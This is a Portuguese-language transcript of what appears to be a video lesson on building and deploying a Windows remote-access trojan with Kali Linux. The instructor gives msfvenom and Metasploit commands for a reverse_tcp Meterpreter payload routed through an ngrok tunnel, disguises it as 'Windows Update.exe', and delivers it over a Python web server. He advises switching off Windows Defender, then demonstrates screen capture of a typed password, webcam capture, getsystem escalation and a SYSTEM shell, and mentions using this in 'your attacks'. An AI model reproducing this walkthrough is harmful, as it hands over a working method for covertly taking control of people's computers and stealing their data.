Fala pessoal, nessa aula nós vamos falar sobre payload e também sobre malware. Diferente da aula anterior, aqui nós vamos mexer com Kali Linux e criar um payload, aí, um arquivo malicioso via linha de comando, tá? Através do shell do Kali Linux. Então bora para minha tela aqui, porque tem muito conteúdo pela frente e tá muito incrível. Vamos juntos aqui criar um malware junto com o payload aí e descobrir como são as suas funcionalidades, o que a gente consegue fazer, tudo isso via linha de comando. Bora lá! E é claro, antes de mais nada, para nós falarmos, a gente precisa entender o que é o conceito, o fundamento por trás, para não sair apenas executando e fazendo um monte de coisa sem saber o que estamos fazendo, tá? Então vamos lá. O que é um payload? Tá? O termo payload, ele refere-se a uma carga útil ou um conjunto de instruções ali que o computador recebe, tá? Que são entregues e executadas no sistema. Então, importante lembrar, nem todo payload é malicioso. Isso aqui é realmente muito importante, porque quando a gente está mexendo com segurança da informação, a gente sim está falando de um payload, uma carga maliciosa, uma carga útil ali, uma instrução que vai, às vezes, né, não é o melhor para o sistema. A gente está burlando o sistema, mas só o termo payload não significa que ele é algo malicioso. A gente está falando de uma carga de instruções, um conjunto de instruções, tá? E a gente vai ver aqui alguns exemplos, tá, bem legais. Então, payload é uma carga útil, um conjunto de instruções. Por que nem todo payload ele é malicioso? Vamos entender. No desenvolvimento de software, e aí alguns programadores, quem já programa, quem já tem aí uma familiaridade com o desenvolvimento de software, vai entender o que eu estou dizendo aqui. Se você não tem familiaridade com desenvolvimento, não se preocupe, você também vai entender, porque a gente deixou de um jeito bem tranquilo de se explicar, tá? No desenvolvimento de software, na programação, tá? O termo payload, ele é utilizado para se referir aos dados ou informações úteis que são transportados em uma comunicação ou transferência de dados. Então, quem está desenvolvendo software já ouviu várias vezes falar em payload, e é claro que nem sempre vai ser malicioso. Não é algo ali que vai burlar o sistema, tá? Então, ele pode ser utilizado, por exemplo, para automatização de tarefas, para transferência de dados, pode ser utilizado aí para fins, né? Porque como ele é uma carga útil, ele é um conjunto de instruções, você só insere ele para ele automatizar alguma tarefa. Então ele é muito utilizado para automatização de tarefas, tá? Agora, quando a gente fala payload na segurança ofensiva, no hacking, aí sim a gente está falando de um conjunto de instruções, né? Que a gente se refere a um código malicioso que é entregue a um sistema-alvo com o objetivo de executar ações que são maliciosas. Obviamente, porque o computador, meu computador, por exemplo, ele não foi feito para entregar informações para você. Ele foi feito para que eu consiga manipular informações, para que eu, dono do computador, ou quem estiver utilizando, use de maneira correta e não para ficar mandando informações que estão nele para outro lugar, né? Principalmente informações sensíveis. A gente está falando aqui de informações que são confidenciais, né? Minhas fotos, meus e-mails. Então tá nesse computador, ela deve se manter nesse computador, a não ser que eu queira, por minha vontade, não alguém pegando sem eu saber. Então é um conjunto de instruções aí que vai fazer exatamente isso, né? Pegar sem eu saber. Então aqui a gente tem alguns exemplos, ó. Ele pode capturar teclas, esse payload, né? Ele pode ser feito aí para capturar webcam. A webcam, ela tá aqui, mas é para ser utilizada quando eu quiser que ela seja utilizada. Quando eu for abrir uma meeting, uma reunião ou uma conversa e quiser que alguém me veja, eu vou lá e abro. Não, sem meu consentimento, ele vai abrir a câmera aqui, webcam. Então exatamente isso é o que o payload está fazendo. Ele pode, a qualquer momento, abrir a câmera e me ver. Tá? Então captura de informações confidenciais, execução de ações maliciosas. E aí o payload, tá? Ele pode executar, depois que uma vez que ele está dentro aqui do meu computador, aí ele pode executar quase qualquer coisa que ele quiser, tá? Agora, se ele for root, se ele for o administrador do sistema, aí sim ele pode fazer qualquer coisa que ele quiser, tá? A gente vai ver isso aí também na prática. Agora, a gente vai ver e vai fazer, tá, um ataque com payload malicioso. Para isso, nós vamos utilizar uma ferramenta do Kali Linux, no próprio Kali Linux, que se chama MSF Venom. Já ouviu falar nessa ferramenta? Ela é nativa do Kali Linux,
tá? E muitos Linux também tem. Se não tiver, não tem problema. Assim que você tentar executar MSF Venom, ele vai dizer que não tem para você instalar. Daí você aperta ou Y de yes ou S de sim, tá? Mas se você já tenha instalado o Kali, pode ser em máquina virtual, pode ser em alguma outra forma, pode ficar tranquilo que já vai ter naturalmente. Então, o que é o MSF Venom? Tá? É uma ferramenta, tá, do Metasploit Framework, que ela é um gerador de payloads. Sim, a gente consegue gerar payloads para Android, para Windows, e a gente vai criar, você vai ver, e de formas personalizadas, tá? Com qualquer nome que a gente quiser, com qualquer tamanho que a gente quiser, em qualquer pasta que a gente quiser. Então é bem personalizável. E aí a gente, com esse payload, a gente consegue explorar vulnerabilidades em sistemas. Tá? Aqui eu estou falando de criar um payload. Então a gente vai criar um arquivo executável para que seja, né, obviamente, executado e assim a gente ter mais informações. Mas tem um detalhe, e um detalhe muito importante, tá? Ele não é utilizado só para isso. No exploit a gente consegue explorar vulnerabilidades sem a outra pessoa executar, inclusive. Aí mais para frente a gente pode dar uma olhada nisso também. Na criação do payload, tá? A gente vai fazer isso agora na prática. Eu sei que você estava ansioso para isso. Também estou ansioso para, junto com você aí, utilizar alguns comandos. Eu deixei até aqui um embaixo. Não se preocupe, tá? Durante a aula aqui eu vou rodar alguns comandos, mas aqui embaixo na descrição vão ter os mesmos comandos para que você possa copiar, colar de maneira fácil. Até ficar gravado aí na sua mente e você conseguir executar de maneira tranquila, beleza? Então, para isso, vamos lá. A gente vai... Aqui já está na parte final. Vamos lá agora aqui para o Kali Linux, combinado? Então você vai abrir o Kali Linux aí comigo. Eu vou abrir aqui Kali. Já estou dentro do meu Kali Linux, tá? Eu vou abrir aqui o Shell, que é o meu terminalzinho aqui. Vou deixar ele até um pouco mais para o canto aqui, para caso a gente comece a chegar aqui embaixo, a minha imagem não fique na frente, tá? Antes de mais nada, nós vamos abrir, isso é muito importante. Eu vou abrir como root aqui, ó. Então o que eu acabei de fazer, tá? Olha só, eu vim aqui em cima, mudei pra... Ele tava aqui como... Vou até fazer de novo. Ele tá aqui. Se eu clicar no Shell, você pode ver que ele tá preto. Ele vai abrir como se fosse um usuário comum do Kali. Se eu vier aqui, ó, terminal como root, ele já vai pedir a senha e vai abrir como root, tá? Eu poderia fazer dessa forma, eu ia fazer dessa forma, mas eu vou até fazer o seguinte, ó. Sudo su, pronto, já sou root. Por que eu vou virar root? Porque a gente vai utilizar o ngrok agora. Atenção, lembra que na aula anterior a gente utilizou o ngrok no Windows, só que a porta de comunicação, na verdade o protocolo de comunicação que nós utilizamos foi o TCP, que é para comunicação, né, entre computadores. Então dessa forma a gente vai também aqui abrir uma porta chamada um protocolo TCP, tá? Então vamos lá, ngrok TCP, só que diferente da aula anterior que a gente utilizou 1337, agora nós vamos utilizar a 444. Por que 444? Gente, eu gosto de utilizar, tá? Foi uma das primeiras formas que eu aprendi então comecei a utilizar e desde lá então eu continuo utilizando a mesma porta, tá? Mas fique à vontade, aqui como eu já expliquei na aula anterior, é uma porta apenas de comunicação. Então a gente vai usar a 444, mas poderia ser 333, poderia ser 555, nada impediria, tá? Poderia ser tranquilamente. É costume mesmo, tá? Então se você quiser me acompanhar, fique à vontade para digitar aí junto comigo na porta 444, o protocolo TCP. Maravilha, já estamos com o nosso ngrok rodando aqui, ó, beleza? Que nós já havíamos configurado em outras partes, tá? Mesma coisa, a gente tem aqui a porta, aqui na verdade a porta, né? A gente tem aqui o servidor, que é o nosso, teoricamente é o IP, o host name, tá? E o localhost. Eu vou minimizar porque por enquanto a gente não vai utilizar, daqui a pouco a gente vai voltar aí naquela parte. E agora, gente, nós vamos digitar o seguinte, ó. Vou digitar o sudo msf venom, aí esse comando vai estar aqui embaixo. Por que eu estou digitando sudo? Porque eu quero rodar como root. Mas como aqui eu sou o Kali, não sou o root, eu jogo o sudo antes, em vez de ter que fazer um sudo su, entendeu? Então vamos lá, msf venom, beleza, menos p de plataforma, né, de payload de plataforma. A plataforma que eu quero utilizar
é a plataforma do Windows. Então eu vou digitar Windows barra Meterpreter barra reverse on the line. E a gente, olha só que interessante também, ó. Eu digito o comandinho, o começo dele, dou um tab. E aí, o que acontece? Ele me completa, tá? Então, Meterpreter barra... Quando eu digito rev, se eu parei no V e eu dei um tab, ele já completou o resto. Reverse, aí on the line. A gente vai utilizar o TCP, né? Então, bora lá. Vou trazer um pouquinho mais pra cá. Agora a gente vai digitar em maiúsculo, tá? Lport não, Lport é depois. Lhost igual. Agora vai vir o seguinte. A gente vai voltar aqui no nosso outro shell. Nessa instância aqui, ó. Vamos copiar aqui, ó. Vou copiar. Seleção. Então, tá vendo, ó? Lembrando, a partir do zero aqui, né, na verdade, até o IO. Então, é isso que eu vou fazer, ó. Lhost, colar seleção. Beleza? Então, qual porta? Vamos definir agora. Lport igual... vamos ver aqui. Eu já não lembro mais. Cabeça. A porta vai ser a 14432. Então, copiar seleção. No seu caso, vai ser uma outra porta. Você copia aí, tá? Vou colar. Então, na porta. Então, Lport igual 14432. Combinado? Espaço. Format. Na verdade, então, a gente vai digitar um "-f". Que é de format. "-f", deixa eu trazer mais pra cá, ó. Enquanto aqui tá em cima, eu vou deixar assim, tá? Eu não tô atrapalhando, pra ficar melhor pra vocês visualizarem. Então, sudo msf venom -p windows barra meterpreter barra reverse underline tcp lhost igual, a gente passou o nosso hostname, espaço lport igual 14432 "-f", continuando aqui, f de format, que é o formato, exe, vai ser um arquivo executável, tá? A gente vai rodar ele no Windows, a gente já vai chegar lá, -o, que é output, esse O aqui é de output, tá? A saída dele, onde eu quero que esse arquivo fique. Então eu vou passar o caminho, ó, /home, /kali, vou passar no usuário kali, e agora a gente vai dar um nome, tá? Então vamos dar um nome aqui, vai se chamar Windows Update.exe. Combinado? Então, ó, passei o caminho e aqui no final eu passo qual que é o arquivo que eu quero. Eu quero que ele se chame Windows Update.exe. Assim que eu dou um enter, ele vai pedir a senha. Tranquilo, porque eu tenho que ser root, né? Vou jogar um Kali. Vamos aguardar ele criar o nosso software, né? O nosso payload, nosso arquivo executável, né? Então ele não é um software ainda. A não ser que eu juntasse ele com alguma coisa. Então, maravilha, ele terminou. Se você concluir com êxito comigo, ele vai mostrar aqui, ó, final size, qual que é o tamanho do arquivo final. Ele foi salvo aqui, ó, na pasta onde eu pedi, ó, home, kali, Windows Update. Então, vamos ver se ele foi salvo mesmo? Vou dar um ls. Ó, olha só que legal, ó. Eu tenho aqui o Windows Update, tá? .exe. Então, é esse o executável que eu tenho. Eu tinha até criado um anterior, ó, uma atualização, aí o nome, gente, à vontade, tá? Engenharia social, poderia se chamar jogo.exe. Nesse caso, a gente jogou aqui Windows Update, tá? Agora que eu já tenho ele, o que eu vou fazer? Eu vou fazer o seguinte, ó, msf console. Então, se você criou, ele já vai estar na pasta. Como eu joguei na pasta home, kali, por isso que quando eu listei aqui, ele tá aqui, ó. Opa! Ele tá aqui, ó, Windows Update, tá? Você dá um ls para ver se ele vai mostrar aí o arquivo executável. Abriu o arquivo executável aí, ele listou aí, perfeito, ele já tá criado. Então vamos lá, msf console. Para nós utilizarmos agora o framework do Metasploit. Olha só que legal, ele tá iniciando, ó, Start Metasploit Framework Console. E é onde que aqui que a gente vai começar a rodar os comandos, tá? Então agora eu trago para cá. Nessa parte aqui, gente, é muito interessante. Olha só, a gente já está dentro do Metasploit. Dentro desse Metasploit eu tenho 2000 exploits.
tá? Eu posso criar mais de 900 tipos de payloads, tá? É muito legal. Tem 9 evasion aqui, né? Então vamos lá. Vamos dar continuidade aqui. A gente já criou o nosso arquivo, agora a gente precisa configurar a parte de comunicação desse arquivo com a minha máquina. Vamos lá. Use mut/handler. Isso aqui é tranquilo, tá, gente? Você vai fazer o mesmo comando que eu tô rodando, você vai rodar aí, também vai dar certo. Use mut/handler, tá? E aí ele vai mostrar aqui, ó, a gente vai configurar o payload, tá? É um shell que a gente já configurou lá, reverse underline TCP. A gente já colocou umas configurações iniciais, né? Uma porta ali, um host, mas a gente vai configurar agora a nossa máquina para receber essa comunicação, tá? Então, mut/handler. Então vamos lá. Feito isso, eu vou digitar o seguinte, ó, set payload. A gente vai setar o nosso payload, beleza? Eu não tô na frente, maravilha. Então a gente vai digitar o seguinte, ó, Windows /Matterpreter /reverse underline, e a gente já passou por essa parte, né? Reverse underline TCP. Então eu vou setar agora esse meu payload para Windows. Beleza, já estou nele aqui, ó. Tô setando, ele já me mostra o payload que eu vou setar. Então, vamos lá. Show options. Gente, até aqui igual também, tá? Você não vai mudar nada, só rodar o comando. Show options. Olha só que interessante. Quando eu coloquei Show Options, ele me mostrou algumas coisas. O meu host, aqui ele não está definido, eu vou precisar definir, tá? E a minha porta tá errada. Tá errada, não tá? A gente tinha colocado essa porta? Não, a gente tinha colocado 444. Aqui tem um 4 a mais. Então a gente vai mudar isso aqui agora, tá? Então vamos lá. Set, vamos lá, lhost. Nesse caso aqui, eu já explico, tá? A gente vai digitar 0.0.0.0. Por quê? Porque o host, a gente não vai utilizar o meu IP aqui pessoal, tá? A gente nem localhost. A gente vai utilizar aquele host que a gente passou lá no ngrok. Lembra que a gente passou lá lhost, a gente passou do ngrok para fazer o redirecionamento para minha máquina? Então, vai ser o 0.0.0.0, tá? Pode colocar 0.0.0 mesmo aí, tranquilo. Setei, agora a gente vai definir a nossa porta, tá? Então vamos lá. Set lport, e agora sim, o 444. E agora eu vou dar mais uma vez aqui, ó, show options. Beleza, conseguimos mudar aquelas configurações lá, ó. Então lhost, beleza, localhost, tranquilo. Agora a porta é importante, porque a gente aqui no nosso ngrok, a gente aqui, ó, localhost 444, tá? Vai ser essa porta aqui. E agora, gente, eu posso já dar um exploit, posso dar um run aqui para rodar, mas eu quero fazer algo com vocês aqui, tá? A gente já tem esse arquivo. Eu vou fazer o seguinte, ó, Python 3-m. Isso aqui a gente já viu na aula de Kali, né? Como criar um servidor com Python. E eu vou passar aqui, ó, Python 3-m, HTTP server na porta 8080. Você já vai entender o porquê que a gente vai criar esse servidor aqui, ó. Criei o servidor, vou deixar ele rodando. Agora, na minha outra máquina pessoal, na minha outra máquina, né? Onde está o meu Windows aqui, eu vou abrir. Tá entendendo agora? Por que eu tô fazendo isso, gente? Porque eu tô usando uma máquina só. Mas esse arquivo aqui você poderia enviar por e-mail para uma outra máquina. Você poderia tirar ele com um pendrive e levar para um outro sistema, tá? Para você rodar no outro sistema e ver o funcionamento dele, ver a escuta dele aqui, como a gente vai fazer. Mas você pode me copiar aqui também, tá? Eu gosto de fazer isso. Até porque ele é um executável. E um executável a gente vai rodar ele no Windows. Então, como a gente já tem aqui um Windows na minha máquina virtual, tá? Você também com certeza já vai ter. Você pode fazer o seguinte, ó. Você vem aqui, eu vou abrir a internet, e a gente já viu essa parte de como criar, né, um servidor ali com Linux e tal. Eu vou pegar, agora eu quero acessar essa minha máquina. A gente já subiu um servidor em Python na porta 8080. Vou jogar aqui, ó, ifconfig. Eu tô nesse IP aqui, ó. Eu vou copiar esse IP 200.80. E aqui na minha VirtualBox,
192.168.200.80 e vou aqui, ó, 8080. 2 pontos 8080, né? Porque é através da porta 8080. Por termos já criado o servidor com Python, agora a gente consegue acesso à máquina, certo? E olha só que legal. Aqui embaixo, eu vou até dar um zoom aqui para você ver, ó. Aqui embaixo a gente tem, ó, Windows Update.exe. Olha quem tá aqui. Eu vou clicar para fazer o download. Aí eu já fiz o download, ó, cliquei, porque dessa forma eu consigo, né, pegar esse arquivo aqui para minha máquina. Entendeu por que a gente criou agora o servidor com Python? E aí na máquina do Windows eu só acessei através da porta. Isso porque eu estou em localhost, tá? Detalhe, é importante você saber. E as máquinas estão se comunicando. Se eu vier aqui, ó, cmd ipconfig, olha só que legal. Essa máquina aqui é a 200.79 e a máquina do Kali é a 200.80. Por que isso acontece? Só recapitulando, porque todas elas são modo bridge, tá? Então se eu vier aqui nas configurações dela, configurações de rede, aqui ó, rede, configurações de rede, todas elas, ó, placa em modo bridge, tá? Então para quem tem o Windows ou quem tá utilizando o VirtualBox, lembra de sempre verificar se tá em modo bridge. Para quem usa macOS, se estiver utilizando outro sistema, geralmente já é padrão o modo bridge, tá? Ele já se comunica entre si, bem tranquilo. Agora, se você estiver utilizando o VirtualBox, aí você consegue validar se está em modo bridge. Então, já baixei o software, ele está aqui, ó. Já a gente vai executar ele. Primeiro eu vou vir aqui no meu Kali e vou digitar o seguinte, ó. Vou fechar aqui. Ainda com o nosso MFS Console aberto, eu vou digitar Run para rodar, ó. Agora ele já falou, startou. Agora eu só estou esperando a comunicação. Já iniciamos. O Run, ele vai rodar aí o nosso payload para escuta. É a mesma coisa do casar lá, se a gente tivesse clicado em Start Listening. Então agora eu estou escutando. Qualquer pessoa que executar aquele arquivo, eu vou ter acesso à máquina dela e já vai aparecer aqui para mim. Vamos ver? Voltando aqui no VirtualBox do Windows, eu vou rodar, ó. Cliquei aqui, ele pergunta, você tem certeza? Tenho. Olha, ele tá, você pode ver que o meu mouse, ó, ele tá como se estivesse rodando alguma coisa. E olha que interessante, ele não rodou nada. Porque a gente não configurou, não juntou ele com arquivo nenhum, ele só executou aqui. Se eu vier aqui agora no meu Kali, olha só que interessante. Metterpreter Session 1 Opened. Isso é muito incrível, gente. Agora aqui eu já tenho acesso a um shell da outra máquina. Como é que eu sei? Gente, ele não tá mais escutando, ó. Ele abriu uma conexão, ó. Tá vendo? Aqui isso aqui mostra um opened. Se eu tivesse, agora vamos lá. Se eu tivesse 5 pessoas ao mesmo tempo tivesse aberto esse meu aplicativo, tá? Esse meu software, ele ia aparecer aqui Session 1, Session 2, Session 3, ele ia aparecer 5 sessões, tá? E aí como é que eu alternaria entre elas? Digitando Sessions-i para mim conseguir, para que eu consiga, né, passar entre uma sessão e outra, tá? Nesse caso ele abriu uma sessão só. E vamos ver agora o que a gente consegue fazer, tá? Aqui eu vou digitar o seguinte, ó, sysinfo, para que eu possa pegar as informações do sistema. Então quando eu digitei sysinfo, olha só quem eu sou agora. Eu sou o Cyber-PC e eu não sou mais um Kali. Eu não tô no Kali aqui, ó. Eu dei qual que é a informação do sistema? Eu sou o Windows 7. Lembrando que essa informação, tá? E outros comandos que você pode rodar depois que você já tem uma shell aberta, que você tem uma conexão reversa aberta aí, como a gente conseguiu aqui, né? A gente vai deixar aqui embaixo, tá? Um documento com várias possibilidades para que você possa digitar sysinfo, para pegar o webcam também, webcam underline snap, para pegar um screenshot da tela. Você vai ter todos esses comandos que você pode rodar, tá? E detalhe, você também pode procurar, né, tutoriais aí afora, mais informações, porque sempre vão surgindo novos comandos, tá? Para escalar privilégios e tudo mais. Bom, voltando aqui à aula, agora eu sou o Cyber-PC, que se eu vier aqui, ó, na minha máquina virtual do Windows, e aí se eu vier aqui no meu computador, olha só quem ele é, ó. Eu sou esse cara aqui, ó, Cyber-PC, e eu tenho as informações dele, ó, tá rodando no Windows 7, mas um detalhe importante,
eu quero até mostrar para vocês. Vocês viram que eu baixei, né? A gente criou um server aqui no Python e eu fui lá, baixei o arquivo e executei ele de boa. Executei ele tranquilamente, porque o meu Windows, ele tá tranquilo, eu nunca mais fiz atualização nele. Ele é um Windows, né, Windows 7, um tanto quanto antigo, mas se você estiver rodando aí o Windows 10, Windows 11, Windows 7 mesmo, mas com mais atualizações, é possível, tá? Vou adiantar que na hora que você for executar o arquivo, ele não deixa, ele barre. Então como é que você resolve isso? Tá? Primeiro que é importante nessa máquina aqui não ter antivírus, porque você pode utilizar o vírus total, e aqui você está fazendo testes. Ou você pausa o antivírus, né, na hora que você for executar o seu próprio software malicioso antes que ele barre, ou você pode fazer o seguinte, ó, que na verdade talvez você vai precisar fazer, você vai vir e vai procurar aqui, ó, Windows Defender, e aí, nesse caso, isso aqui pode ver até que a tela é antiga, né, mas se eu vier aqui em ferramentas, opções, eu tenho aqui, ó, proteção em tempo real, a minha tá desabilitada, ó, usar proteção em tempo real, não quero, eu quero que rode tudo tranquilamente. Então, você vê que eu rodo arquivos, ele não faz validação. Se o seu for barrado, se não for barrado, maravilha. Você pode continuar executando, aí a gente continua a aula aqui. Se for barrado, lembrando, que às vezes pode ser que seja barrado, você desativa o Windows Defender dele, tá? Então, voltemos aqui à explicação. Agora, eu já sou esse cara aqui, ó. Eu sou o CyberPC. E o que eu posso rodar, gente? Eu dei um Ctrl L para limpar. Gente, agora as possibilidades são infinitas. Tá? Eu posso dar um PS, eu vou ver tudo que são os processos, né? Então, ó, vírus.exe que eu já criei, tá lá rodando ainda. Google Crash, Audilog, ó o client aqui, ó, client.exe. Então, são todos os processos que estão rodando na máquina, ó. O Inlogon, que a gente já logou. O PS me dá todos os processos. Eu quero ver get UID. Quero ver quem eu sou, né? Além do Sinzif, eu só quero ver quem eu sou. Get UID, eu sou o CyberPC, usuário Cyber, tá? Mais coisas. Se eu quisesse pegar a webcam, não dá, tá? Porque não tem webcam ali na minha máquina virtual. Mas eu rodaria o comando aqui, ó, webcam underline snap. Olha lá, ó, o alvo não tem webcam. Mas se eu desse um webcam da snap, ele ia fazer o quê? Ele ia tirar uma foto rapidinho aqui da webcam e ia salvar ali na área de trabalho, tá? Na minha pasta, tá? Vamos lá, eu posso rodar screenshot, eu posso rodar também, ó. Eu quero pegar, capturar a tela, ó. Inclusive eu vou vir aqui, ó. Vamos supor que o usuário, ele tá ali, ó. Ele tá bem na hora que tá digitando a senha dele, ó. Senha, aula, traço, payload, traço MSF, e colocar aqui, ó, site MSF Venom. Um exemplo, tá nessa tela. E bem nessa hora, eu quero ver o que o usuário tá acontecendo ali, que quero ver o que ele tá digitando, qual tela que ele tá. Eu posso dar um screenshot, ó. Assim que eu dou um screenshot, olha só que legal, ele salvou. Ó. Ele salvou um screenshot da tela do meu alvo. Em qual pasta? Em Home, Kali, aqui, ó. Então, se eu vier aqui na minha pasta, ó, vou aqui em abrir pasta. E se eu clicar aqui, ó, 2 vezes, ó, olha só o print. Eu tenho o print aqui, o screenshot, né, da tela, ó, que eu tô lá, ó. Exatamente o que a gente tá editando, ó, aula, payload, MSF. Então salvou aqui pra mim, tá? E várias, toda vez eu posso então colocar aqui pra dar um screenshot e várias outras coisas. Se eu quisesse subir ou escalar privilégios é o seguinte, se eu der um get UID, eu sou o CyberPC. Então eu sou o usuário Cyber. Tem coisa que eu consigo rodar, a maioria delas, mas tem coisa que eu não consigo fazer. Então eu posso dar um get system. Ó, agora ele pegou através de uma técnica, ele fez um impersonation, né? Ele tá se passando aqui pelo admin. Então, vamos dar um get UID de novo. Agora eu sou a autoridade do sistema. Você viu que a gente deu um get UID? Eu era o Cyber. Agora não. Agora a gente jogou um get system, eu peguei o root do sistema e agora eu sou a autoridade máxima do sistema. Ou seja, eu posso remover arquivos, eu posso inserir arquivos, posso fazer o que eu quiser. Tá? O sistema não me barra mais, porque eu sou o usuário autoridade. Combinado? E vários outros comandos a gente vai deixar aí para você rodar, tá? Bem tranquilo, para que você possa utilizar aí nas aulas e até mesmo nos seus ataques. Pessoal, mais uma coisa importante aqui que eu quero mostrar para vocês é que, não sei se vocês repararam, mas eu estou utilizando o Matterpreter
E através do Betterpreter eu consigo dar um ls, eu consigo utilizar comandos do próprio Linux para andar na máquina e ver tudo que tem na máquina ali, né? Então, por exemplo, eu dou um cd, eu volto, olha lá, ó, agora eu quero ir para o desktop de novo. Se eu der um ls, olha quem tá aqui, ó, o server, o server.rar. Se eu fizer o seguinte, ó, eu posso fazer, vou dar um Ctrl L aqui para limpar, eu posso entrar na pasta de downloads, olha lá, ó, downloads, eu dei um ls-l, ele me listou ó, o Windows Update aqui, ó, que a gente tinha baixado, mas você reparou que eu estou utilizando comandos do Linux. E se eu quisesse rodar comandos direto do Windows, como se eu estivesse lá na máquina, rodando um PowerShell, rodando um CMD? É possível também. Olha só que legal. É só eu digitar Shell. Assim que eu digito Shell, olha só, ele criou um canal para que eu possa me comunicar e agora eu sou o Microsoft Windows. Se eu der um ls, por exemplo, ó, ele não é reconhecido. Não é reconhecido como um sistema interno. Porque eu estou no System32 do sistema. Eu agora, se eu der um dir, olha isso. Para listar as pastas, eu tenho que digitar dir. Aqui o CD ele continua funcionando, tá? Mas agora eu sou... É como se eu tivesse isso aqui, gente, só para explicar para vocês, tá? CLS. CLS seria para limpar a tela. Ó, nem limpar ele tá deixando mais. É como se eu tivesse feito o seguinte, ó. Eu tivesse aberto aqui no meu sistema o CMD. Só que diferente, ó, ele tá pegando o Cyber ali, ó. A diferença é que eu teria aberto o CMD como root. Porque agora a gente é autoridade do sistema, né? Se eu executar como administrador, ó. Olha só, System32. É como se eu tivesse nessa telinha aqui, ó. Tá bom? Praticamente eu estou nessa tela aqui, só que via payload, lá no Kali. Combinado? Então, quiser sair dessa tela, é só você dar um Ctrl C e aqui ele vai perguntar, ó, você quer realmente terminar o canal? Você clica aqui sim, yes, né? E aí eu posso dar um Ctrl L e voltar novamente a rodar comandos Linux, que eu acho mais tranquilo, tá? A gente já viu alguns comandos Linux, você já viu, mas para quem gosta do Windows, usar o CMD, é uma parte legal também, se digita Shell, aí você consegue aí, através do CMD, comandos Linux, mas eu acho bem interessante mantermos aí no Linux, tá bom? Listando pasta com ls, abrindo alguma coisa com open e assim por diante, tá bom? Bom, pessoal, essa foi a aula de hoje. Você viu quanta coisa incrível a gente conseguiu fazer aqui. A gente criou juntos um payload através do Kali Linux e via linha de comando, né, com o framework do MSF Venom, onde um arquivo infectado pode nos dar acesso à máquina. E ali você viu que a gente conseguiria dar um ls, listar todos os arquivos, ver quais arquivos a pessoa tinha ou tem, né, e tirar até foto da tela com o comando screenshot. Eu quero até pedir para que você também faça esse teste através de uma máquina virtual mesmo, ou um ambiente controlado, ou se tiver um notebook ou outro sistema, joga esse arquivo para o outro sistema, de modo que você consiga controlar tudo via Shell, Reverse TCP. Combinado? Eu espero que você tenha curtido essa aula e eu te vejo nas próximas aulas. Tamo junto!